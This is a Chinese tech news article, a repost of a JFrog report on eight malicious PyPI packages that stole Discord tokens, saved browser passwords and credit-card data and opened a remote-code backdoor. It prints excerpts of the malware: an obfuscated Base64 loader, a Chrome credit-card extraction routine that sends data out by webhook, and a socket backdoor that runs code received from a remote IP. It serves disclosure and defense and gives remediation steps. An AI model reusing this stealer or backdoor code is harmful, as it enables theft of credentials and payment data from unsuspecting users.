PyPI又双叒叕发现恶意软件,能盗取信用卡还有后门程序

新闻 应用安全
Python程序员真的要小心了,PyPI软件库问题真是越来越严重。继今年6月出现挖矿病毒后,PyPI最近再次出现了一批恶意软件。

[[415370]]

本文经AI新媒体量子位(公众号ID:QbitAI)授权转载,转载请联系出处。

Python程序员真的要小心了,PyPI软件库问题真是越来越严重。

继今年6月出现挖矿病毒后,PyPI最近再次出现了一批恶意软件,

JFrog安全团队发现,PyPI库中有多个软件存在盗取信用卡信息远程注入代码的行为,而这些软件总共被下载了3万次。

这些被发现问题的恶意软件分别是:

PyPI又双叒叕发现恶意软件,能盗取信用卡还有后门程序

当程序员安装完这些软件后,它们将在后台不知不觉读取浏览器文件夹,从而盗取信用卡信息和密码。

它们是如何窃取信用卡信息的

安全研究人员发现,上述所有软件包都使用Base64编码进行伪装。

比如上述的noblesse2:

  1. import base64, codecs 
  2. magic = 'aW1wb3J0IGNvbG9yYW1hLCBkYXRldGltZS...' 
  3. love = '0iLKOcY3L4Y2q1nJkxpl97nJE9Y2EyoTI0M...' 
  4. god = 'a2luZy5hcHBlbmQodG9rZW4pDQogICAgICAg...' 
  5. destiny = 'yxIKAVDaAQK3xjpQWkqRAboUcBIzqjEmS...' 
  6. joy = '\x72\x6f\x74\x31\x33' 
  7. trust = eval('\x6d\x61\x67\x69\x63') + eval('\x63\x6f\x64\x65\x63\x73\x2e\x64...'
  8. eval(compile(base64.b64decode(eval('\x74\x72\x75\x73\x74')),'','exec')) 

这种方法可以欺骗一些简单的分析工具,但是仔细研究可以发现其中的问题。

以上8个软件包分别包含了以下不同种类的恶意行为:

1、窃取Discord帐户身份验证token

Discord身份验证token读取器的代码非常简单,它就是一组硬编码的路径:

  1. local = os.getenv('LOCALAPPDATA'
  2. roaming = os.getenv('APPDATA'
  3. paths = { 
  4.     'Discord': roaming + '\\Discord'
  5.     'Discord Canary': roaming + '\\discordcanary'
  6.     'Discord PTB': roaming + '\\discordptb'
  7.     'Google Chrome': local + '\\Google\\Chrome\\User Data\\Default'
  8.     'Opera': roaming + '\\Opera Software\\Opera Stable'
  9.     'Brave': local + '\\BraveSoftware\\Brave-Browser\\User Data\\Default'
  10.     'Yandex': local + '\\Yandex\\YandexBrowser\\User Data\\Default' 

然后代码会读取这几种浏览器路径下的所有.log和.ldb文件,并查找Discord身份验证token,结果通过Webhook上传到Discord。

2、窃取浏览器存储的密码或信用卡数据

当你在浏览器中输入密码或信用卡数据时,一般都会跳出如下窗口,提示用户保存这些信息。

PyPI又双叒叕发现恶意软件,能盗取信用卡还有后门程序

虽然这给用户带来方便,今后不用一遍遍输入密码,但缺点是这些信息可能会恶意软件获取。

在这种情况下,恶意软件会尝试从Chrome窃取信用卡信息:

  1. def cs(): 
  2.     master_key = master() 
  3.     login_db = os.environ['USERPROFILE'] + os.sep + \ 
  4.         r'AppData\Local\Google\Chrome\User Data\default\Web Data' 
  5.     shutil.copy2(login_db, 
  6.                  "CCvault.db"
  7.     conn = sqlite3.connect("CCvault.db"
  8.     cursor = conn.cursor() 
  9.     try
  10.         cursor.execute("SELECT * FROM credit_cards"
  11.         for r in cursor.fetchall(): 
  12.             username = r[1
  13.             encrypted_password = r[4
  14.             decrypted_password = dpw( 
  15.                 encrypted_password, master_key) 
  16.             expire_mon = r[2
  17.             expire_year = r[3
  18.             hook.send(f"CARD-NAME: " + username + "\nNUMBER: " + decrypted_password + "\nEXPIRY M: " + str(expire_mon) + "\nEXPIRY Y: " + str(expire_year) + "\n" + "*" * 10 + "\n"

这些信息和前一种情况一样会通过Webhook上传。

3、收集有关受感染PC的信息:如IP地址、计算机名称和用户名

除此之外,这些软件还会收集Windows许可证密钥信息、Windows版本以及屏幕截图。

4、远程代码注入

pytagora和pytagora2这两个恶意软件会尝试连接到某个IP地址9009端口上,然后执行Socket中可用的任何Python代码。

其中混淆的代码被安全人员解码成如下片段:

  1. import socket,struct,time 
  2. s=socket.socket(2,socket.socket.socket.SOCK_STREAM) 
  3. s.connect(('172.16.60.80',9009)) 
  4. l=struct.unpack('>I',s.recv(4))[0
  5. print (l) 
  6. d=s.recv(l) 
  7. print (d) 
  8. while len(d)>!1
  9. d+=s.recv(l-len(d)) 
  10. print (d) 
  11. exec(d,{'s':s}) 

但是安全人员现在不知道这个IP地址是什么,或者上面是否存在恶意软件。

中毒后如何挽救

如果你发现自己的电脑已经安装了诸如noblesse的恶意软件,那么请检查一下你的浏览器到底保存了哪些密码,这些密码可能已经泄露,请尽快修改。

对于Edge浏览器用户,请在地址栏中输入edge://settings/passwords,查看已保存的密码。

对于Chrome浏览器用户,请在地址栏中输入chrome://settings/payments,在付款方式一栏下查看已保存的信用卡信息。

另外可以松口气的是,PyPI维护人员已经删除了这些恶意软件包。

虽然PyPI软件库现在是安全了,但是鉴于这些开源软件库现在的维护状态,未来很可能还会遇到更多攻击。今年PyPI库出现安全问题的状况就不止一次出现。

[[415371]]

“攻击者能够使用简单的混淆技术来引入恶意软件,这意味着开发人员必须保持警惕。”

JFrog CTO说,“这是一个系统性威胁,需要由软件存储库的维护者和开发人员在多个层面积极解决。”

 

 

责任编辑:张燕妮 来源: 量子位
相关推荐

2021-08-05 06:22:02

恶意软件Python软件信用卡

2017-03-13 16:58:05

戴尔

2018-11-08 17:57:22

华为

2021-10-30 19:01:17

磁盘字节文件

2024-12-06 14:58:22

2021-08-04 09:24:58

PyPI恶意软件漏洞

2024-04-03 15:41:53

服务器

2020-05-18 13:23:59

宁畅

2018-01-17 16:36:40

Windows 10Windows免费升级

2023-01-10 11:37:22

Python 库PySnooper项目

2018-04-13 11:14:42

2017-11-21 10:13:11

微软打印机补丁

2020-09-01 11:00:14

UltraRank恶意代码网络攻击

2022-08-10 18:20:25

信用卡窃取新加坡网络钓鱼

2021-02-22 10:04:10

黑客Google AppsCSP

2023-12-15 09:19:44

百度飞桨文心大模型大模型

2020-03-27 22:29:16

信息安全网络攻击东京奥运会

2017-08-23 17:59:57

ROOBO

2017-08-23 12:55:51

ROOBO

2017-04-27 11:09:52

信用卡支付技术
点赞
收藏

51CTO技术栈公众号